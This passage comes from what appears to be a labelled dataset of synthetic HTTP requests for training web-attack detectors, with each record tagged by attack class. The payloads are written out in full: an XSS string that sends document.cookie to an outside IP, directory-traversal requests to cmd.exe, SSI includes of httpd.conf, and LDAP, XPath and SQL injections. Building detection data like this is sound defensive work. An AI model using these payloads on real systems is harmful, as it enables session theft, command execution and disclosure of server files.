Cookie: eCpse=bs:iO;7m6aDssl=ussmrhosnGnn;gSoroOrmI=(neadmin9
Cookie2: $Version="816"
Date: Sat, 17 Jan 09 14:06:14 UTC
ETag: W/"fGQbBlOes2k28gT0z"
Expect: nnsar
From: setrsl@itqn6e.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Fri, 25 Mar 05 20:05:49 UTC
If-Match: "8inwmELvQoa6Fc5"
If-None-Match: *
If-Range: "A1up1YKmbEegNY7Jj0"
Max-Forwards: 096
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Htseo kOIv=thetog
Range: 38889-,402727-278555
Referer: /taaagviy/otrowgrT.tar
TE: deflate
Trailer: Accept-Language
User-Agent: t-ZCajR1F http://www.5TolTa2t.ch
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: weqp; e0tpea4=ettre
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37241
Start - Id: 47880
class: XSS
GET /ao0ozxmenomv/2yvbXl9DQiahtpasspassthrup/d4/-CpositionG.html?5ye=%3Ca++++href%3D++++%22++++about%3A%3Cs%26%2399%3Bript++++%3E%5Bwindow.open%28%27http%3A%2F%2F23.91.168.73%2Fne.php4%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E++++%22++%3E&ehcr0ol9Eyaw=%24j&agtcathbepc=xigrnekEneNz&eetsttsiae=ino-%28etiaAwL%2F&5lb9d=t HTTP/1.0
Host: www.eoi8o2.it:24
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.4, gzip;q=0.1
Accept-Language: eSneodau-gidl;q=0.6, d-ap;q=0.8, ns-eo1;q=0.7, smwietn-an2tjY, nnT-ntwysaB;q=0.0
Cache-Control: no-transform
Client-ip: 85.234.191.196
Cookie: yexupdatelYj@mv=o2i
Cookie2: $Version="24"
Date: Fri, 14 Nov 08 21:36:04 CET
ETag: "g@pHW7UV-x7nc7Q"
Expect: lrhe
From: loGrTtE@euoweraEr.be
If-Modified-Since: Wed, 26 Jul 06 03:59:46 GMT
If-Unmodified-Since: Sat, 20 Dec 08 08:35:49 CET
If-Match: *
If-None-Match: "pk5-mkIfox.3wj9.o"
If-Range: "M9@GgC3h9YJ5aOB"
Max-Forwards: 33
MIME-Version: 0.4
Pragma: bwtB='vorb'
Proxy-Authorization: Digest qop=auth
Authorization: Basic N2FuMDplZWZXczRi
Range: 064-,-6198,422476-
Referer: http://icEO.be/mAAyeyB/tuh3yc.ace
TE: chunked
Trailer: Accept
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 7.2; gs-Vt; rv:0.9.8) Gecko/78023529
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: FreeBSD
UA-Pixels: 3411x5439
Via: HTTP/4.2 www.dess.png:38024, FTP/2.7 82.181.115.235, HTTP/5.4 www.awehpoa.shtml
Transfer-Encoding: compress
Upgrade: dglC/5.9, mee/7.3, oitlI/6.9, acmtu/7.6
Warning: 417 www.nmwhs.jpg "hngvi5nseoeon" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47880
Start - Id: 42897
class: OsCommanding
GET /rtt93orrrnz2eth9ys/beszfuoazt4jtneo/zKhDjLOy6@26a3H/hre6hlrxtleh/luRycQoASJQNfJC/aNhh1d4/gOtaemnb5esj/ev7/er0higeIE9cettplm/crceatrelswksldier/htrlmbRmo6ea.shtml?nncN=th%3Ce&1ranea=xsPj&we3wtrwsHcoads=ut&b6cukv8s=eVo%27%26%5C%29qe&hSdYaQa=691&rwue3atsut=Rn&neyaf6z=6&g7bodyXQtmzzQV=104.140.37.56+++%7Ccmd.exe+%2Fs&htpass0EmcKSbody=cujheesgqsioioo&nqap=Ds&ils=ggpnusramrtcet7f%7Coeny&nhdyd=mailQnagclrhi&7asjff=bittnios1Su8i HTTP/1.1
Host: www.aW3a.uk
Connection: close
Accept: image/gif, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ho-pDr7Eor, h-aennrT
Cache-Control: no-cache
Client-ip: 131.10.230.51
Cookie: oR=a y3r)aoooerwj$t1v
Cookie2: $Version="7"
Date: Thu, 13 Mar 08 16:50:26 GMT
ETag: "k9w8BVzKj5xSUfP6tQT"
Expect: torrt
From: joee@s55ufxJoae.be
If-Unmodified-Since: Fri, 20 Jun 08 02:11:24 GMT
If-Match: "zoqCVLwx.m@sLsjAA"
If-None-Match: *
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: trscen n7thehl=sjeDAir
Referer: http://www.oecIfwl.cz/ahtnhts.txt
TE: trailers,trailers,trailers
User-Agent: utcsa4wEinnmm
UA-Disp: 2272,6803,16
UA-Color: color32
Via: 7.3 www.wdgAsi.js, 9.5 32.49.91.171
Transfer-Encoding: identity
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42897
Start - Id: 38649
class: LdapInjection
GET /txv-3kSjnUtGxPOWaxhj/eDo5YH/oUn8odk/s7ujc0tihCPserDr/sAphW/aUmX9YoiG.QEsJ6ESrkF/mC/bgsoundMW96KMusr8cit/ghrPnfOxjdhV2n1.jpeg?4stcnEmisawnl=ia%29%28%26%28objectClass+%3Deeap*%29 HTTP/1.1
Host: 156.85.81.113:5
Connection: close
Accept: text/xml;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: smqlsrvu=wohieyq
Client-ip: 48.249.181.128
Cookie: ttasthtxnnygpse=LotrhamxeaMoovnlo;7edsU=2347;prxtre0=698129;lVMV9qGPYcR=vn4fmo;HmWV=5376594;rrw=n
Cookie2: $Version="7"
Date: Sat, 21 Oct 06 15:21:16 GMT
ETag: "eyDCB5QN-Yd1FZKT8r1y"
Expect: 100-continue
From: omeiaw@etteheLi.gov
If-Modified-Since: Wed, 14 Nov 07 04:24:46 UTC
If-Unmodified-Since: Fri, 08 Jun 07 09:41:25 CET
If-Match: "MTEBdKH10-iTV63"
If-None-Match: *
If-Range: "8bgzxnzsxYeTvi5_KeH"
Max-Forwards: 07
MIME-Version: 3.2
Pragma: hlhe='i5du'
Proxy-Authorization: NTLM aXllb3RQdGZmZXl0cEpsazlrc2VzZXNodGV1bG1nQWRv
Authorization: ee1i s6s1sO=fl8rhr
Range: 25834-,48-325537
Referer: /5dUnlhu/dywd3ihs/dbopnw.php3
TE: deflate,chunked
Trailer: Transfer-Encoding
User-Agent: ruUIarcbwomll
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 8.1 www.o2ee.tiff, HTTP/7.7 www.ZEaeOo.jpg
Transfer-Encoding: LcgLle; esatst=Ihr3fw
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 509 249.249.5.171 "evmsicsfdrnmFbad" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38649
Start - Id: 44189
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ioc7Tz5otn.st
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-2;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 241.231.162.21
Cookie: o2mo=formF;xjpemaasxmovo=14399360;webspedsg=421973
Cookie2: $Version="1"
Date: Mon, 15 Jan 07 08:52:30 GMT
ETag: "v0U9uAwSq_0imKTW"
Expect: tndt=le3s;e8nEso=Izpi
From: gozi@ydNwdaf.st
If-Modified-Since: Wed, 29 Aug 07 24:56:10 UTC
If-Unmodified-Since: Wed, 07 Jan 04 03:20:55 GMT
If-Match: *
If-None-Match: ".kTQU1l@3gRY6mN"
If-Range: Thu, 30 Dec 04 04:25:15 GMT
Max-Forwards: 7485
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: cDaurr ereutyh=ddc7ens
Range: 22399-
Referer: http://www.ttieH.st/telsh.pdf
TE: trailers
Trailer: Upgrade
User-Agent: ry6O5KwR http://www.2b2t.cz
UA-CPU: PowerPC
UA-Disp: 054,707,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 389x154
Via: 8.5 www.2mraoMi.js, HTTP/4.0 7.123.118.193
Transfer-Encoding: gzip
Upgrade: daad/0.7, ule/2.7
Warning: 029 235.65.195.127 "i3YfHit9o" 
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44189
Start - Id: 50014
class: XPathInjection
POST /s0ZTu2tBb/tedsOt/oiissa.php3? HTTP/1.1
Content-Length: 89
Content-Language: o8uao,29k
Content-Encoding: compress
Content-Location: /p8ira7et.pdf
Content-MD5: bmFCdmE3ZzNlbml0bHdvUA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 17:23:13 UTC
Last-Modified: Tue, 25 Jan 05 18:15:18 CET
Host: 254.167.223.227:864
Connection: yeeitaEt
Accept: application/postscript;q=0.8
Accept-Charset: ks_c_5601-1987, isiri-3342;q=0.6, x-mac-arabic;q=0.4, windows-1257;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: ueith=wimlot
Client-ip: 63.108.226.5
Cookie: eB=%shutdownhdztmpprCTecq;y32whtaccesT3Tdf=256524
Cookie2: $Version="209"
Date: Sat, 02 Feb 08 03:04:18 UTC
ETag: "X5MZbOJm_td_EEp@O"
Expect: a0eysadl=eytmxc
From: Ecil@targ.fr
If-Modified-Since: Mon, 11 Apr 05 13:41:07 UTC
If-Unmodified-Since: Tue, 27 Jul 04 23:40:35 CET
If-Match: *
If-None-Match: *
If-Range: "hpsuWIdHeWIiJrykJ"
Max-Forwards: 74
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bGZJdHM0c2dvbGVTZkFkd09yc2E1QmRlZGlyc3Rjb25pOWZnZXRzOUk=
Authorization: NTLM ZW5yZUU5b2Rycm5waWlyMzRJanNvcjZzYXBpYXJyb2FnTmdMaUFhcg==
Range: 1-0902
Referer: /tdtdw24n/leo6/ntwntm.js
TE: trailers
Trailer: Date
User-Agent: eoAnYe'   or   6 <     count(path/child::*)  or '7J'  =    '
UA-CPU: Sparc
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9581x753
Via: 1.2 www.edxba.shtml:148, 4.8 www.iRteeb.htm, hts/7.0 172.214.184.157:938
Transfer-Encoding: os1u83; njrttHu=efnd
Upgrade: 3nj/9.8
Warning: 564 52.222.167.222 "leuooidehona9x22" "Wed, 27 Jun 07 17:18:35 GMT"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

oaeonTere=e@eFT2dF&irjCUlrihsftm=2wyb/an&rr6soi=ftbin&i7haet&speohr7=Atd60eeeimaIs1

End - Id: 50014
Start - Id: 38978
class: LdapInjection
GET /ubkfaajO2V/nonge9o/6d2UdF.RGZ/p9Bfyn6R7NPCi.html?@5TAo4M=%29+%28%7C%28displayName%3Dhad*%29%28name%3D+++had*+++%29%28+++mail%3Dhad*++%29&penhhslogidk7d=vhtacces%3Dx+%28oatc%29dvgacd+boot.inic&ln=240115&6GSFUQ=o_38yOA&SaIy=yajoxnIOI6&iead=aplejscjce&sotscnr9ni8lrva=yepsoe&unnmQei=71&dei=0301544 HTTP/1.1
Host: www.Nt7s.uk
Connection: close
Accept: application/zip, audio/x-wav
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: iRAhS-d1eeg, apad-aenwi;q=0.1, RivT-d0iodey, nspr-ec1s;q=0.9, otn-nujie
Cache-Control: max-stale
Client-ip: 39.110.44.223
Cookie: tMgmrWhwdewm=08825
Cookie2: $Version="732"
Date: Thu, 18 Oct 07 10:39:15 UTC
ETag: W/"aTH7ojAKF7GuLTnx"
Expect: 100-continue
From: aPbb@hdints.de
If-Modified-Since: Mon, 22 May 06 02:47:52 CET
If-Unmodified-Since: Thu, 23 Jul 09 24:37:49 UTC
If-Match: "-bh6PVfsKGNMKV-"
If-None-Match: *
If-Range: "HhF1kiMkkPg4wFXvIn"
Max-Forwards: 4
MIME-Version: 8.0
Pragma: ebl3JI='e'
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: Basic MGRsdWQ6ZG5zYWc=
Range: -026476,-042,-27632
Referer: http://InLbeE.org/oNn2e/exdht/nuahnZls/iyaebor/faQ2e.rar
TE: trailers,gzip;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/2.7 (Windows; U; Win 9x 0.0; uN-an; rv:0.3.7) Gecko/54092474
UA-CPU: MIPS
UA-Pixels: 8193x847
Via: 7.5 www.uuwuwE.gif, 4.1 www.rsgtnt.jpg
Transfer-Encoding: ouat; nwMsn=ctyo
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 95673
----: ---------------------

null

End - Id: 38978
Start - Id: 37759
class: LdapInjection
GET /iOfWQ_IqfHSPg/1e/4uG5qJ/soorblriYeoe4Ec/YeaybV8L8F-/a2z0qedaFKTWNNc0lLd/ah2tHh22ei/xratuecphlfdct51rela/h8/9kitAclCbnoeaa.jpeg?_xssuIbody=w7ntmp6eMo&Hat=seM6wosst0ffeecho&e3tafirie=iNqobBFO7&dzo=en%3A&autoexec8ow9e=7tt&a5=1mqtimg&leslcmb8wttss=yxege&sbteew3igrtSlnp=983275&kzopeneUM1=84&i4e=5&6bl=816&ufuchni8ap=%29++++%28+%7C++%28displayName%3Dhad*%29+++%28name+%3D++++had*+%29%28mail%3Dhad*+%29&1eE6rl9idl=EteilIlyitvnurhrTc HTTP/1.1
Host: www.chteStb.net:80
Connection: ta0hNma
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.9
Accept-Encoding: identity
Accept-Language: *
Cache-Control: min-fresh=99111
Client-ip: 28.9.182.133
Cookie: 8Hrngauoie=6l1c8;esunftde=0t;cptaoenzhOmtp=323645759;abetween5gCQZ.p0aT=5
Cookie2: $Version="51"
Date: Thu, 23 Dec 04 09:51:04 UTC
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Tue, 12 Sep 06 04:22:45 CET
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: *
If-None-Match: "5DnzHxrvmrh1thg"
If-Range: "d9PISRG.MZaoAeAaY2wC"
Max-Forwards: 63
MIME-Version: 0.5
Pragma: ed9ke2r='It3ehM6'
Authorization: Basic TmllbGFlbmM6SXdsa2Fjcw==
Range: 6-
Referer: /MDpcatt/xeeent3r/dsir/e4qn.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.4 (Windows; U; Win98 9.7; wA-sP; rv:5.4.8) Gecko/87701441
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 4.7 237.96.107.82:2, 5.5 www.uhaCz.png, FTP/7.8 91.64.194.212:43
Transfer-Encoding: deflate
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 49.81.169.152
X-Serial-Number: 753563632869650663
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37759
Start - Id: 49852
class: XPathInjection
GET /elteHm4hrtahs/qbwjUJt/qnof/efWvyWscript/oei/ewca/eoeargNp5soas.cgi?at=6EeiijaiZh&mnsarlsyq=29205427&nrGmtteebyl=w+in+&rnetivetcfc=5hGn3Fy8x48M&rsom=s8rnndeAsrson&ensto2nmnewt6r=0&rearzfNewdpe=tmo%2Fe%2Firh%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D3%5D+%7C++++eot79%2FormbEh%2FegM%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D08%5D+or+%27anIsooS%27+%3D+++%27&lq=4072&tccEn9nL6t=7fuC4&oaA5p=T HTTP/1.1
Host: 120.222.186.70
Connection: keep-alive
Accept: audio/*;q=0.0, audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.5, identity;q=0.9, gzip, deflate;q=0.0
Accept-Language: 6i-tph, ow-eEaOcaZ;q=0.6
Cache-Control: max-stale=89
Client-ip: 236.200.66.115
Cookie: sWHvnvwzllu5siy=e;z1xgrdallQcopyW=95;O0iselect11dX6W=2mauTiuxQE;clJF-=j3B@ s~wp-etci0qen4gh
Cookie2: $Version="7"
Date: Sun, 19 Jun 05 19:23:33 UTC
ETag: W/"Xx8JR4V4r-QIlXyJ"
Expect: 100-continue
From: ohlydam@WdehaAi.biz
If-Modified-Since: Wed, 10 Dec 08 24:13:51 GMT
If-Unmodified-Since: Wed, 30 Dec 09 21:28:58 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "Rd8lnWTUmjeqffHUmwS"
If-Range: Fri, 26 Oct 07 20:04:00 GMT
Max-Forwards: 729
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest opaque="dscetms"
Range: 98475-041,374-
Referer: /ahwtln/dq7g/Aireos/ert5f/nneEe.shtml
TE: chunked
Trailer: Upgrade
User-Agent: aLsaSo/9.9.7.7
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: FTP/0.7 140.133.133.58
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 56.172.198.103
X-Serial-Number: 6075380404911977
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49852
Start - Id: 44487
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 2.102.21.74
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 20.163.26.161
Cookie: osgazerughwcu=nxsxzRHAGbdP;2e=18173305;ah62obctel=tbAJJAfT4zMN
Cookie2: $Version="5"
Date: Fri, 07 May 04 19:53:19 UTC
ETag: "iW-oDqyOW0NFzNS1j"
Expect: mnteO
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: *
If-None-Match: "Wv3dz0LsGOYkj.I1X8"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 291
MIME-Version: 9.7
Pragma: est01a=r
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: -80,3-,-9028
Referer: http://www.3lnde.uk/amBLtt/ltla7nt/7smiii/ciane.jpeg
TE: gzip,trailers
Trailer: Via
User-Agent: cwjiivtirlgazort7o
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 949x9593
Via: 9.5 www.ahbdsyg.jpeg, FTP/8.3 www.cgge1.css, HTTP/7.7 209.179.94.120
Transfer-Encoding: compress
Upgrade: et3/3.3, etd8ae/9.5
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44487
Start - Id: 39650
class: SSI
GET /zstcoirtaadpnsre/s0frTeodsevn.php4?tieatsikmue=84&wGiit0irdGritin=r3yow0&p7eseDi=10&vesoacsolrs=%3C%21--%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++++--%3E HTTP/1.0
Host: www.eeihaizv.it:80
Connection: close
Accept: video/quicktime;q=0.7
Accept-Charset: iso-8859-8-i, windows-1252, iso-8859-6, x-mac-arabic;q=0.0, x-mac-turkish;q=0.6
Accept-Encoding: 
Accept-Language: naee-pdst;q=0.0, asTik-srfIos;q=0.0, roSai8-o, aisoiin3-hyezrst
Cache-Control: jrr=3rLoh
Client-ip: 193.240.238.168
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="185"
Date: Mon, 07 Jun 04 24:50:19 UTC
ETag: "Pte5BHI2KbP1-ib2"
Expect: 100-continue
From: lenzhrem@dasbEmim.st
If-Modified-Since: Wed, 18 Oct 06 15:51:51 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: *
If-None-Match: "aI2_v0pUz3MLYh0SS"
If-Range: *
Max-Forwards: 863
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: /heeA/dxns7/3e8ri3p/s0shir/itsq.cgi
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 8.2; sy-ll; rv:9.6.1) Gecko/75337170
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: HTTP/1.4 www.roev6g5.tiff:422, 6.0 25.68.186.172, FTP/3.2 33.252.128.169
Transfer-Encoding: aetp
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39650
Start - Id: 38306
class: LdapInjection
GET /ez_-S42R_6dtaS/06/si/sDinUnftpK_pW00mochav/fautn/utZtlivDhrtieTreos/yYJdkfm/lrh1ea5vao/rsgxh1ex/VW/achPnpo.css?AarIenbtietO=%29++++%28+%7C%28displayName%3Dhad*%29++++%28name++++%3D+++had*+++%29%28+mail%3Dhad*++++%29&s8ro=418716596&d4jbzp=b0%3Foselbitjmzu&PyYb7cZER%u_=4889442350 HTTP/1.0
Host: 223.173.26.40
Connection: ghtotYny
Accept: text/xml;q=0.3, text/xml
Accept-Charset: x-mac-icelandic, cp-936
Accept-Encoding: 
Accept-Language: norT-itetnt;q=0.9, r0-tuttiar, wjnca-hhe;q=0.6
Cache-Control: max-age=38
Client-ip: 125.61.79.193
Cookie: nsrthtoydr=61;zheAdiynAw=794
Cookie2: $Version="14"
Date: Sun, 07 Dec 08 19:09:17 GMT
ETag: W/"-ggdckprLkOtw2iG"
Expect: k3ilm
From: ctbt@euirsarao.st
If-Modified-Since: Tue, 20 Sep 05 19:00:14 GMT
If-Unmodified-Since: Sat, 14 Jun 08 15:59:27 CET
If-Match: *
If-None-Match: "ap8nXcXyeEHgHSn"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 2827
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest nc=dFD6214b
Range: 187604-278577,03540-,87-
Referer: http://tinvi0i.gov/Lm2ci/m8hl0/pio0/NOlnl/hwrchnss.mdb
TE: deflate,gzip;q=0.0,gzip
Trailer: Pragma
User-Agent: tjxuaineTM
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 5.0 www.wrbs.html, 3.4 65.55.181.145, 7.9 251.55.42.140
Transfer-Encoding: identity
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 38306
Start - Id: 42221
class: SqlInjection
GET /aWvex@DGyB0MMT/em2Ajq-yDJ/ht0hta5Tewebe3se/i3gZ8asFRm0c/yEJwvuY/tSPcrj.gpqcckhi3gGq/9Oyroy6tUd33_hs.tiff?ux9jjhes=%27select+customer_phone++++%27%7C%7C%27from++customers+++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C++++lv_surname%7C%7C%27%27%27+++and+++customer_type%3D1%27%3B HTTP/1.1
Host: 33.176.195.109
Connection: ehjhLi
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 110.144.0.59
Cookie: WoCS=e) lwu-0iprw
Cookie2: $Version="35"
Date: Mon, 21 Jan 08 14:31:38 GMT
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: ozen=eocew;Eaek9=dtudoe9
From: 6bttom@2kOpyg.org
If-Modified-Since: Wed, 15 Apr 09 24:11:50 GMT
If-Unmodified-Since: Mon, 05 Jun 06 09:27:29 CET
If-Match: "NCKukWukmNVxIKFT5p"
If-None-Match: "E@mk8FxwZdsOt_Ws.L6"
If-Range: "nQD8RjO5nsCm4fa88OPP"
Max-Forwards: 3
MIME-Version: 0.3
Pragma: uEttfea='h1nbIhe'
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
Authorization: Digest response="3dFEc973fFBDaf8DdAccD8fD761432C3"
Range: -66
Referer: /po1tkss.jpeg
TE: trailers
Trailer: If-Range
User-Agent: Taoejelnw/0.2
UA-CPU: x86
UA-Disp: 6743,482,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 451x3766
Via: FTP/8.0 www.4He8ilw.shtml, 1d5eu/3.8 76.171.56.196, 6.0 123.216.0.165:62
Transfer-Encoding: identity
Upgrade: s1sE/7.8, ytaat/3.7, hNej/0.0
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42221
Start - Id: 39682
class: SSI
GET /lJfPiKCvNEan4UcJfoUv/7JnBWoe@KndSu/on/95VoFzJB/6nntpRnulji9/ermoSqO7nQZE/mkmLzuYgF_RQK1Ji5/Eidd/e3t64th3io5TiWmtg/aEcLOY9S.yOJg2/yeIOmIxcwb.nsf?L70NC=r%40mr-&8is59hs7uxtsco=%3C%21--+++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&PFuoaM=3&ddCtxmmS=eRbyeibzaaino HTTP/1.0
Host: www.4avhts4.net:18
Connection: eali
Accept: image/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: oe-6akhElxC;q=0.7, siptf-atoey;q=0.2, etD1uzD-m2dssF;q=0.7, arn-io2mro;q=0.3
Cache-Control: only-if-cached
Client-ip: 145.187.69.140
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="5"
Date: Mon, 31 May 04 04:55:14 GMT
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: g1nes2@zh66rlare.org
If-Modified-Since: Thu, 07 Aug 08 19:56:17 UTC
If-Unmodified-Since: Sun, 24 Sep 06 22:07:04 CET
If-Match: "ZtnT-heb@3T5B_plp"
If-None-Match: "tfE-Bj7GvTdbVvRkYZrr"
If-Range: Fri, 25 Sep 09 21:58:38 GMT
Max-Forwards: 743
MIME-Version: 9.9
Pragma: iv=yienah
Proxy-Authorization: Digest nonce
Authorization: Digest nc=bfF4DAEf
Range: 1-2703
Referer: /pstfdpu1/qLAoah.txt
TE: trailers,gzip;q=0.4
Trailer: User-Agent
User-Agent: tnfseIC3sry
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.5 www.ttarfotw.png
Transfer-Encoding: deflate
Upgrade: im0/0.0, gln/3.7
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39682
Start - Id: 38022
class: LdapInjection
